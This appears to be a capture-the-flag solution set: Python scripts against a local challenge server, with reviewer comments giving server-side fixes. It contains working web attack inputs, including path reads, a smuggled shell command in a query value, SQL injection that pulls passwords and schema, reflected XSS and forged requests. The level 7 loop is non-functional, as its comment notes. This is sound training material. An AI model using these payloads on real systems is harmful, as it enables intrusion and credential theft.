Web Security
level 1
import requests
# Level 1: the `path` query parameter is set to an absolute filesystem path.
# NOTE(review): the handler is not shown; presumably it opens whatever path it
# is given - confirm against the challenge source. The server-side fix is to
# resolve the requested name against a fixed base directory and reject any
# result that falls outside it.
target = "http://challenge.localhost?path=/flag"
reply = requests.get(target)
print(reply.text)
level 2
import requests
# Level 2: the `timezone` value carries a second word after the zone name.
# NOTE(review): presumably the handler interpolates `timezone` into a command
# line - confirm against the challenge source. Server-side fix: accept only an
# allow-list of zone names and never pass request data through a shell.
target = "http://challenge.localhost/?timezone=MST date"
reply = requests.get(target)
print(reply.text)
level 3
import requests
# Level 3: asks for user id 1 directly; the request carries no credentials.
# NOTE(review): presumably the handler trusts the client-supplied `user` id -
# confirm. The fix is to derive the identity from an authenticated session and
# to check authorization for the requested record on the server.
target = "http://challenge.localhost/?user=1"
reply = requests.get(target)
print(reply.text)
level 4
import requests
# Level 4: login form whose username ends with a double quote and `--`.
# That shape only has an effect when the server builds its SQL by string
# concatenation: the quote ends the string literal and `--` comments out the
# rest of the statement (presumably the password check - confirm).
# With bound parameters the same value is compared as plain text.
login_form = {"username": 'flag" --', "password": 'flag'}
reply = requests.post("http://challenge.localhost/", data=login_form)
print(reply.text)
level 5
import requests
# Level 5: UNION-based injection through the `query` parameter. Note that this
# is a POST whose payload travels in the query string (params=), not the body.
# The appended SELECT reads the `password` column of `users`, so the result is
# whatever the page renders from the combined row set.
# Server-side fix: bound parameters; as defence in depth, a database account
# that cannot read the credentials table from this code path.
search = {"query": '" UNION SELECT password FROM users --'}
reply = requests.post("http://challenge.localhost/", params=search)
print(reply.text)
level 6
import requests
# Level 6, step 1: same injection point, but the appended SELECT lists table
# names from `sqlite_master`, the SQLite schema catalogue.
# Takeaway for defenders: once injection is possible the schema is readable,
# so unpredictable table names do not protect the data.
search = {"query": '" UNION SELECT tbl_name FROM sqlite_master --'}
reply = requests.post("http://challenge.localhost/", params=search)
print(reply.text)
import requests
# Level 6, step 2: reads `password` from a specific table.
# NOTE(review): the table name looks instance-specific - presumably it is the
# value the catalogue listing returned on the author's run and will differ on
# another instance; confirm before reusing this script.
search = {"query": '" UNION SELECT password FROM table9110909979364706165 --'}
reply = requests.post("http://challenge.localhost/", params=search)
print(reply.text)
level 7
import string
import requests
# Level 7: skeleton of a character-by-character probe that treats a response
# starting with "Hello" as a yes/no signal.
# Indentation was lost in the paste; the nesting below is reconstructed.
# NOTE(review): as written the form data is identical on every iteration (the
# f-string has no placeholders), so the response cannot distinguish
# candidates, and `break` only leaves the inner `for`, so the outer
# `while True` never terminates.
# Defender view: the signal exists because the login page answers differently
# depending on whether the injected condition holds. Bound parameters remove
# the injection; bursts of near-identical login posts from one client are the
# pattern to alert on.
alphabet = string.ascii_letters + string.digits + '{}._-'
recovered = ''
while True:
    for candidate in alphabet:
        form = {
            "username": f'" OR SUBSTR(username, 1, 1 --',
            "password": 'flag',
        }
        reply = requests.post("http://challenge.localhost/", data=form)
        if not reply.text.startswith("Hello"):
            continue
        recovered += candidate
        print(recovered)
        break
level 8
import requests
# Level 8: reflected XSS proof of concept. /visit is handed a URL for /echo
# whose `echo` value is a script element.
# NOTE(review): presumably /visit loads the URL in a browser on the server
# side and /echo writes the value into the page unescaped - confirm.
# Server-side fix: HTML-encode the reflected value on output; a
# Content-Security-Policy that forbids inline script limits the impact.
target = "http://challenge.localhost/visit?url=http://challenge.localhost/echo?echo=<script>alert(1)</script>"
reply = requests.get(target)
print(reply.text)
level 9
import requests
# Level 9: same reflection, but the value first closes a <textarea> and
# reopens one afterwards, which implies /echo renders the value inside a
# textarea element (presumably - confirm against the challenge source).
# Wrapping reflected text in a textarea is not an escape: the value still
# needs HTML-encoding for the context it is written into.
target = "http://challenge.localhost/visit?url=http://challenge.localhost/echo?echo=</textarea><script>alert(1)</script><textarea>"
reply = requests.get(target)
print(reply.text)
level 10
import requests
# Level 10, step 1: asks /visit to load the /leak endpoint.
# NOTE(review): presumably /visit browses with another user's session and
# /leak changes that user's state on a plain GET (cross-site request forgery)
# - confirm against the challenge source.
# Server-side fix: make state changes POST-only behind an anti-CSRF token and
# set SameSite on the session cookie.
reply = requests.get(
    "http://challenge.localhost/visit",
    params={"url": "http://challenge.localhost/leak"},
)
print(reply.text)
import requests
# Level 10, step 2: reads /info for user id 1 without credentials.
# NOTE(review): presumably this only returns the data after the /leak request
# has been made - confirm. The endpoint should authorize the caller for the
# requested user rather than rely on a per-user "leaked" state.
reply = requests.get("http://challenge.localhost/info", params={"user": 1})
print(reply.text)
level 11
import requests
# Level 11, step 1: same request as the previous level - /visit is asked to
# load the /leak endpoint.
# NOTE(review): the script is unchanged from level 10, so whatever this level
# added on the server side did not stop a forged GET; presumably /leak still
# acts on the visitor's session - confirm.
# Server-side fix: POST-only state changes with an anti-CSRF token, plus
# SameSite on the session cookie.
reply = requests.get(
    "http://challenge.localhost/visit",
    params={"url": "http://challenge.localhost/leak"},
)
print(reply.text)
import requests
# Level 11, step 2: reads /info for user id 1 without credentials.
# NOTE(review): presumably the data is only exposed once /leak has been
# triggered - confirm. Authorization for the requested user belongs on this
# endpoint itself.
reply = requests.get("http://challenge.localhost/info", params={"user": 1})
print(reply.text)